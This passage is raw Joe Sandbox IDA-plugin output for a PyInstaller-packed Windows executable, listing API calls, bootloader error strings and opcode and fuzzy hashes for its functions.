                                                            • Instruction Fuzzy Hash: D7317432A18BC196DB60DF25E8402BE73A0FB84754F500136EA9D83B95EF3CD565DB80
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: FileFindFirst_invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 2227656907-0
                                                            • Opcode ID: e601e72e586d0b4de4a5ebf73eb2eb015632a136167348e3e84c4a74a70f75b2
                                                            • Instruction ID: 719320c3835f8aab13872f0896e2f77051db9f52cdce07a5c9406249ec181c09
                                                            • Opcode Fuzzy Hash: e601e72e586d0b4de4a5ebf73eb2eb015632a136167348e3e84c4a74a70f75b2
                                                            • Instruction Fuzzy Hash: B2B1A222F186CA61EA60EF2198146BD6391FB48BD4F545133EA5D87E85FF3CE461E380
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: AddressProc
                                                            • String ID: Failed to get address for PyConfig_Clear$Failed to get address for PyConfig_InitIsolatedConfig$Failed to get address for PyConfig_Read$Failed to get address for PyConfig_SetBytesString$Failed to get address for PyConfig_SetString$Failed to get address for PyConfig_SetWideStringList$Failed to get address for PyErr_Clear$Failed to get address for PyErr_Fetch$Failed to get address for PyErr_NormalizeException$Failed to get address for PyErr_Occurred$Failed to get address for PyErr_Print$Failed to get address for PyErr_Restore$Failed to get address for PyEval_EvalCode$Failed to get address for PyImport_AddModule$Failed to get address for PyImport_ExecCodeModule$Failed to get address for PyImport_ImportModule$Failed to get address for PyList_Append$Failed to get address for PyMarshal_ReadObjectFromString$Failed to get address for PyMem_RawFree$Failed to get address for PyModule_GetDict$Failed to get address for PyObject_CallFunction$Failed to get address for PyObject_CallFunctionObjArgs$Failed to get address for PyObject_GetAttrString$Failed to get address for PyObject_SetAttrString$Failed to get address for PyObject_Str$Failed to get address for PyPreConfig_InitIsolatedConfig$Failed to get address for PyRun_SimpleStringFlags$Failed to get address for PyStatus_Exception$Failed to get address for PySys_GetObject$Failed to get address for PySys_SetObject$Failed to get address for PyUnicode_AsUTF8$Failed to get address for PyUnicode_Decode$Failed to get address for PyUnicode_DecodeFSDefault$Failed to get address for PyUnicode_FromFormat$Failed to get address for PyUnicode_FromString$Failed to get address for PyUnicode_Join$Failed to get address for PyUnicode_Replace$Failed to get address for Py_DecRef$Failed to get address for Py_DecodeLocale$Failed to get address for Py_ExitStatusException$Failed to get address for Py_Finalize$Failed to get address for Py_InitializeFromConfig$Failed to get address 
for Py_IsInitialized$Failed to get address for Py_PreInitialize$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                            • API String ID: 190572456-4266016200
                                                            • Opcode ID: cf77275b4bf0387ff900e5ea28e17749df250fc4abdfb995cff073003fe970f9
                                                            • Instruction ID: 8d50d622943e8e6598fda34096dde47da720655ef49a764220c60cfd2af1b614
                                                            • Opcode Fuzzy Hash: cf77275b4bf0387ff900e5ea28e17749df250fc4abdfb995cff073003fe970f9
                                                            • Instruction Fuzzy Hash: BF12AA64E0AB87B0FA55EF08AC5817C22A1AF05750F855537C81EC66A5FF6CF5B8A3C0
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: Message_fread_nolock
                                                            • String ID: %s%c%s$Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$\$fread$fseek$malloc
                                                            • API String ID: 3065259568-2316137593
                                                            • Opcode ID: 6fc5ac864f703c4be55e556062f1d4a856c1a5df9fca28c7911cf52acfa12488
                                                            • Instruction ID: 0fe441769afbeac6cf82441b997350f485a91df986b5fe5e14d58bec43ab1970
                                                            • Opcode Fuzzy Hash: 6fc5ac864f703c4be55e556062f1d4a856c1a5df9fca28c7911cf52acfa12488
                                                            • Instruction Fuzzy Hash: 0051B321E086C756EA20BB25A8506FE6394EF45784F404133EA4DC7B8AFE7CF595A3C0
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                            • String ID: P%
                                                            • API String ID: 2147705588-2959514604
                                                            • Opcode ID: 7645c0c2d2fce03d3aab2d1fd33ee4a3925b53edade4cf92fedf68089910dc30
                                                            • Instruction ID: 4f4345e58f24669dafbb4ea2ff845b12d59c754ff279f9dfe58234a89b0e90a4
                                                            • Opcode Fuzzy Hash: 7645c0c2d2fce03d3aab2d1fd33ee4a3925b53edade4cf92fedf68089910dc30
                                                            • Instruction Fuzzy Hash: E251F926A147E186D6349F36E0181BEB7A1F798B61F004126EBDE83785DF3CD095DB10
                                                            APIs
                                                            • GetLastError.KERNEL32(00000000,00007FF6DD652A5E,?,?,?,?,?,?,?,?,?,?,?,00007FF6DD65101D), ref: 00007FF6DD658587
                                                            • FormatMessageW.KERNEL32 ref: 00007FF6DD6585B6
                                                            • WideCharToMultiByte.KERNEL32 ref: 00007FF6DD65860C
                                                              • Part of subcall function 00007FF6DD6529E0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6DD6587F2,?,?,?,?,?,?,?,?,?,?,?,00007FF6DD65101D), ref: 00007FF6DD652A14
                                                              • Part of subcall function 00007FF6DD6529E0: MessageBoxW.USER32 ref: 00007FF6DD652AF0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastMessage$ByteCharFormatMultiWide
                                                            • String ID: Failed to encode wchar_t as UTF-8.$FormatMessageW$No error messages generated.$PyInstaller: FormatMessageW failed.$PyInstaller: pyi_win32_utils_to_utf8 failed.$WideCharToMultiByte
                                                            • API String ID: 2920928814-2573406579
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: -$:$f$p$p
                                                            • API String ID: 3215553584-2013873522
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: f$f$p$p$f
                                                            • API String ID: 3215553584-1325933183
                                                            Strings
                                                            Similarity
                                                            • API ID: Message
                                                            • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                            • API String ID: 2030045667-3659356012
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                            • String ID: csm$csm$csm
                                                            • API String ID: 849930591-393685449
                                                            APIs
                                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6DD65101D), ref: 00007FF6DD658747
                                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6DD65101D), ref: 00007FF6DD65879E
                                                            Strings
                                                            Similarity
                                                            • API ID: ByteCharMultiWide
                                                            • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                            • API String ID: 626452242-27947307
                                                            APIs
                                                            • WideCharToMultiByte.KERNEL32(?,00007FF6DD6539EA), ref: 00007FF6DD658C31
                                                              • Part of subcall function 00007FF6DD6529E0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6DD6587F2,?,?,?,?,?,?,?,?,?,?,?,00007FF6DD65101D), ref: 00007FF6DD652A14
                                                              • Part of subcall function 00007FF6DD6529E0: MessageBoxW.USER32 ref: 00007FF6DD652AF0
                                                            • WideCharToMultiByte.KERNEL32(?,00007FF6DD6539EA), ref: 00007FF6DD658CA5
                                                            Strings
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$ErrorLastMessage
                                                            • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                            • API String ID: 3723044601-27947307
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo$_fread_nolock
                                                            • String ID: %s%c%s$ERROR: file already exists but should not: %s$PYINSTALLER_STRICT_UNPACK_MODE$WARNING: file already exists but should not: %s$\
                                                            • API String ID: 3231891352-3501660386
                                                            APIs
                                                            • LoadLibraryExW.KERNEL32(?,?,?,00007FF6DD65E06A,?,?,?,00007FF6DD65DD5C,?,?,00000001,00007FF6DD65D979), ref: 00007FF6DD65DE3D
                                                            • GetLastError.KERNEL32(?,?,?,00007FF6DD65E06A,?,?,?,00007FF6DD65DD5C,?,?,00000001,00007FF6DD65D979), ref: 00007FF6DD65DE4B
                                                            • LoadLibraryExW.KERNEL32(?,?,?,00007FF6DD65E06A,?,?,?,00007FF6DD65DD5C,?,?,00000001,00007FF6DD65D979), ref: 00007FF6DD65DE75
                                                            • FreeLibrary.KERNEL32(?,?,?,00007FF6DD65E06A,?,?,?,00007FF6DD65DD5C,?,?,00000001,00007FF6DD65D979), ref: 00007FF6DD65DEBB
                                                            • GetProcAddress.KERNEL32(?,?,?,00007FF6DD65E06A,?,?,?,00007FF6DD65DD5C,?,?,00000001,00007FF6DD65D979), ref: 00007FF6DD65DEC7
                                                            Strings
                                                            Similarity
                                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                                            • String ID: api-ms-
                                                            • API String ID: 2559590344-2084034818
                                                            APIs
                                                              • Part of subcall function 00007FF6DD658AE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6DD652ABB), ref: 00007FF6DD658B1A
                                                            • ExpandEnvironmentStringsW.KERNEL32(00000000,00007FF6DD6579A1,00000000,?,00000000,00000000,?,00007FF6DD65154F), ref: 00007FF6DD65747F
                                                              • Part of subcall function 00007FF6DD652B30: MessageBoxW.USER32 ref: 00007FF6DD652C05
                                                            Strings
                                                            • LOADER: Failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF6DD6574DA
                                                            • LOADER: Failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF6DD657456
                                                            • LOADER: Failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF6DD657493
                                                            Similarity
                                                            • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                            • String ID: LOADER: Failed to convert runtime-tmpdir to a wide string.$LOADER: Failed to expand environment variables in the runtime-tmpdir.$LOADER: Failed to obtain the absolute path of the runtime-tmpdir.
                                                            • API String ID: 1662231829-3498232454
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6DD652ABB), ref: 00007FF6DD658B1A
                                                              • Part of subcall function 00007FF6DD6529E0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6DD6587F2,?,?,?,?,?,?,?,?,?,?,?,00007FF6DD65101D), ref: 00007FF6DD652A14
                                                              • Part of subcall function 00007FF6DD6529E0: MessageBoxW.USER32 ref: 00007FF6DD652AF0
                                                            • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6DD652ABB), ref: 00007FF6DD658BA0
                                                            Strings
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$ErrorLastMessage
                                                            • String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
                                                            • API String ID: 3723044601-876015163
                                                            APIs
                                                            Similarity
                                                            • API ID: Value$ErrorLast
                                                            • String ID:
                                                            • API String ID: 2506987500-0
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                            • String ID: CONOUT$
                                                            • API String ID: 3230265001-3130406586
                                                            APIs
                                                            • GetLastError.KERNEL32(?,?,?,00007FF6DD6654CD,?,?,?,?,00007FF6DD66F1BF,?,?,00000000,00007FF6DD66B9A6,?,?,?), ref: 00007FF6DD66B897
                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6DD6654CD,?,?,?,?,00007FF6DD66F1BF,?,?,00000000,00007FF6DD66B9A6,?,?,?), ref: 00007FF6DD66B8CD
                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6DD6654CD,?,?,?,?,00007FF6DD66F1BF,?,?,00000000,00007FF6DD66B9A6,?,?,?), ref: 00007FF6DD66B8FA
                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6DD6654CD,?,?,?,?,00007FF6DD66F1BF,?,?,00000000,00007FF6DD66B9A6,?,?,?), ref: 00007FF6DD66B90B
                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6DD6654CD,?,?,?,?,00007FF6DD66F1BF,?,?,00000000,00007FF6DD66B9A6,?,?,?), ref: 00007FF6DD66B91C
                                                            • SetLastError.KERNEL32(?,?,?,00007FF6DD6654CD,?,?,?,?,00007FF6DD66F1BF,?,?,00000000,00007FF6DD66B9A6,?,?,?), ref: 00007FF6DD66B937
                                                            Similarity
                                                            • API ID: Value$ErrorLast
                                                            • String ID:
                                                            • API String ID: 2506987500-0
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                            • String ID: csm$f
                                                            • API String ID: 2395640692-629598281
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                            • String ID: Unhandled exception in script
                                                            • API String ID: 3081866767-2699770090
                                                            APIs
                                                            • GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6DD6587F2,?,?,?,?,?,?,?,?,?,?,?,00007FF6DD65101D), ref: 00007FF6DD652A14
                                                              • Part of subcall function 00007FF6DD658560: GetLastError.KERNEL32(00000000,00007FF6DD652A5E,?,?,?,?,?,?,?,?,?,?,?,00007FF6DD65101D), ref: 00007FF6DD658587
                                                              • Part of subcall function 00007FF6DD658560: FormatMessageW.KERNEL32 ref: 00007FF6DD6585B6
                                                              • Part of subcall function 00007FF6DD658AE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6DD652ABB), ref: 00007FF6DD658B1A
                                                            • MessageBoxW.USER32 ref: 00007FF6DD652AF0
                                                            • MessageBoxA.USER32 ref: 00007FF6DD652B0C
                                                            Strings
                                                            Similarity
                                                            • API ID: Message$ErrorLast$ByteCharFormatMultiWide
                                                            • String ID: %s%s: %s$Fatal error detected
                                                            • API String ID: 2806210788-2410924014
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                            • String ID: CorExitProcess$mscoree.dll
                                                            • API String ID: 4061214504-1276376045
                                                            APIs
                                                            Similarity
                                                            • API ID: _set_statfp
                                                            • String ID:
                                                            • API String ID: 1156100317-0
                                                            APIs
                                                            • FlsGetValue.KERNEL32(?,?,?,00007FF6DD66AB67,?,?,00000000,00007FF6DD66AE02,?,?,?,?,?,00007FF6DD6630CC), ref: 00007FF6DD66B96F
                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6DD66AB67,?,?,00000000,00007FF6DD66AE02,?,?,?,?,?,00007FF6DD6630CC), ref: 00007FF6DD66B98E
                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6DD66AB67,?,?,00000000,00007FF6DD66AE02,?,?,?,?,?,00007FF6DD6630CC), ref: 00007FF6DD66B9B6
                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6DD66AB67,?,?,00000000,00007FF6DD66AE02,?,?,?,?,?,00007FF6DD6630CC), ref: 00007FF6DD66B9C7
                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6DD66AB67,?,?,00000000,00007FF6DD66AE02,?,?,?,?,?,00007FF6DD6630CC), ref: 00007FF6DD66B9D8
                                                            Similarity
                                                            • API ID: Value
                                                            • String ID:
                                                            • API String ID: 3702945584-0
                                                            APIs
                                                            Similarity
                                                            • API ID: Value
                                                            • String ID:
                                                            • API String ID: 3702945584-0
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: verbose
                                                            • API String ID: 3215553584-579935070
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                            • API String ID: 3215553584-1196891531
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: CallEncodePointerTranslator
                                                            • String ID: MOC$RCC
                                                            • API String ID: 3544855599-2084237596
                                                            • Opcode ID: 37ce56c1d967fba8f41503b71a699ba51a6fbc199d8f022e66d4a2d7a57293db
                                                            • Instruction ID: b256a92644c57a6a2bd09413cc87ab8942c5646d0eb876b9827834fdcb6d410b
                                                            • Opcode Fuzzy Hash: 37ce56c1d967fba8f41503b71a699ba51a6fbc199d8f022e66d4a2d7a57293db
                                                            • Instruction Fuzzy Hash: D5614C32E08A8586E720EF65D4403BD77A0F744B98F144226EF4D57B96EF38E1A5D740
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                            • String ID: csm$csm
                                                            • API String ID: 3896166516-3733052814
                                                            • Opcode ID: 80d5d2ed719ea387a00afc8e5c38e85421d4b0de11d669121429011e6c75d481
                                                            • Instruction ID: 398ee3a9c23287896ebaefb361f8dd186448ae3733d5b42ea6b1abe0143d9371
                                                            • Opcode Fuzzy Hash: 80d5d2ed719ea387a00afc8e5c38e85421d4b0de11d669121429011e6c75d481
                                                            • Instruction Fuzzy Hash: 85518B32D082C286EB64AF21914437C77A0EB54B94F144136DA9D87BD7EF3CE4B4AB80
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: Message$ByteCharMultiWide
                                                            • String ID: %s%s: %s$Fatal error detected
                                                            • API String ID: 1878133881-2410924014
                                                            • Opcode ID: e8e3c511841a02337865787422672dc7088828a74b651abb3bad42d47e8d3758
                                                            • Instruction ID: 78d0d43c9c76662688de2e286167d27e4594e203d4f584e312b0fd3d32e4a2ee
                                                            • Opcode Fuzzy Hash: e8e3c511841a02337865787422672dc7088828a74b651abb3bad42d47e8d3758
                                                            • Instruction Fuzzy Hash: 35316772E286C291E620FB14E4516EE6354FF847C4F804137E68D87A9AEF3CD655DB80
                                                            APIs
                                                            • GetModuleFileNameW.KERNEL32(?,00007FF6DD6539EA), ref: 00007FF6DD653EF1
                                                              • Part of subcall function 00007FF6DD6529E0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6DD6587F2,?,?,?,?,?,?,?,?,?,?,?,00007FF6DD65101D), ref: 00007FF6DD652A14
                                                              • Part of subcall function 00007FF6DD6529E0: MessageBoxW.USER32 ref: 00007FF6DD652AF0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastMessageModuleName
                                                            • String ID: Failed to convert executable path to UTF-8.$Failed to get executable path.$GetModuleFileNameW
                                                            • API String ID: 2581892565-1977442011
                                                            • Opcode ID: 227eff0bc0a0d80c8f8e7ebb06cca3199172163df290dc8daf9e61b6ec9130a6
                                                            • Instruction ID: cb2db3001cdce4a13430c057c362b5a3f49a1041a5bedf48d359e77cccca83c4
                                                            • Opcode Fuzzy Hash: 227eff0bc0a0d80c8f8e7ebb06cca3199172163df290dc8daf9e61b6ec9130a6
                                                            • Instruction Fuzzy Hash: 81018461F2D6C6A1FE60B724E8553BD1261AF5CBC8F800437D84DC6693FE1CE1A5A790
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: FileWrite$ConsoleErrorLastOutput
                                                            • String ID:
                                                            • API String ID: 2718003287-0
                                                            • Opcode ID: 9513e67bca3e1584d4e6c680d6c879e0cc2bad3dff94493eb0c92e1d92f8606a
                                                            • Instruction ID: 7b44d1be9db94310ba5bb99df5c355feec16dc363d64bc43d8e9cf77241f2931
                                                            • Opcode Fuzzy Hash: 9513e67bca3e1584d4e6c680d6c879e0cc2bad3dff94493eb0c92e1d92f8606a
                                                            • Instruction Fuzzy Hash: 3BD10572F18A818AE710EFB5D8401AC3B71FB84798F014276DE5D97B89EE38D426D380
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: LongWindow$DialogInvalidateRect
                                                            • String ID:
                                                            • API String ID: 1956198572-0
                                                            • Opcode ID: ecac84c754e5eddc26d74cef75c58701df5fcac281216c238072f9f7c8686c02
                                                            • Instruction ID: 5453d7363ba971c08e60512e1cabe4bb24ab8eb95601b302a85e713cfb6eb2ba
                                                            • Opcode Fuzzy Hash: ecac84c754e5eddc26d74cef75c58701df5fcac281216c238072f9f7c8686c02
                                                            • Instruction Fuzzy Hash: 7711A921E081C682FB54AB69F54467D1391EF88B90F548032DA494AB9FEE2CE8E16640
                                                            APIs
                                                            Memory Dump Source
